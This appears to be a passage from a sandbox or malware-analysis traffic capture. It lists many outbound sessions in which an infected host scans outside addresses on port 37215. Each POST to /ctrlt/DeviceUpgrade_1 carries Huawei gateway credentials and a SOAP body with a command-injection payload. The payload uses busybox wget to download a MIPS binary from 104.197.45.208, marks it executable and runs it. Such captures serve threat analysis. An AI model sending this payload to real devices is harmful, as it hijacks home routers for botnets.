                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            98192.168.2.1455344156.169.159.3637215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.663168907 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            99192.168.2.1435026197.2.201.1737215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.663182020 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            100192.168.2.1434212156.219.247.6237215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.663211107 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            101192.168.2.144658641.59.10.21237215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.663230896 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            102192.168.2.145823441.129.130.2137215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.663249016 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            103192.168.2.145252041.169.58.13837215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.663289070 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            104192.168.2.143916441.180.54.1437215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.663310051 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            105192.168.2.1439700156.205.118.7937215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.663341045 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            106192.168.2.144651641.75.213.16137215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.663362980 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            107192.168.2.1444680156.60.18.21337215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.663383961 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            108192.168.2.1459590197.193.225.6537215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.663405895 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
